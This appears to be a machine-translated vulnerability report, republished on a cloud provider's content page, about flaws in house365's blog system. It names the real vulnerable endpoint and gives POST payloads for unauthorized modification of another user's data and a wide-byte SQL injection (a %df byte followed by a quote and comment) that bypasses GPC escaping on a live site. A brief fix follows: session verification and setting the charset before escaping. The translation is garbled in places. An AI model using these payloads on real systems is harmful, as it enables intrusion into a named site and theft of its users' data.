365 real estate network configuration leakage + unauthorized + Injection

Source: Internet
Author: User

Http://blog.house365.com/ajaxuser.php? Type = blog & action = atcblogclass & job = add

UPDATE pw_userinfo SET dirdb = ......................


Send data:

Blogclass = AAAAAAAAAAAAAAAAA "\ & itemid = 1 & uid = 1 & name =


Note that you can modify the uid as needed.


Changed the blog tag of uid to 1.

Cannot be injected when gpc is enabled? Byte helps you!

Blogclass = 007 & itemid = 1 & uid = 1% df '-- & name =

 


WHERE uid = '1 € '#'
It's closed...

Changed the blog tag of uid to 5.

 

Cannot be injected when gpc is enabled? Byte helps you!

Blogclass = 007 & itemid = 1 & uid = 1% df '-- & name =

 

 


WHERE uid = '1 € '#'
It's closed... This is the main site injection .... All user data is stored in.
Solution:
Verify the SESSION or cookies of the uid.

Wide byte injection:

It is recommended to use mysql_set_charset to set the character set mysql_real_escape_string escape SQL statement.

The character set is binary.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.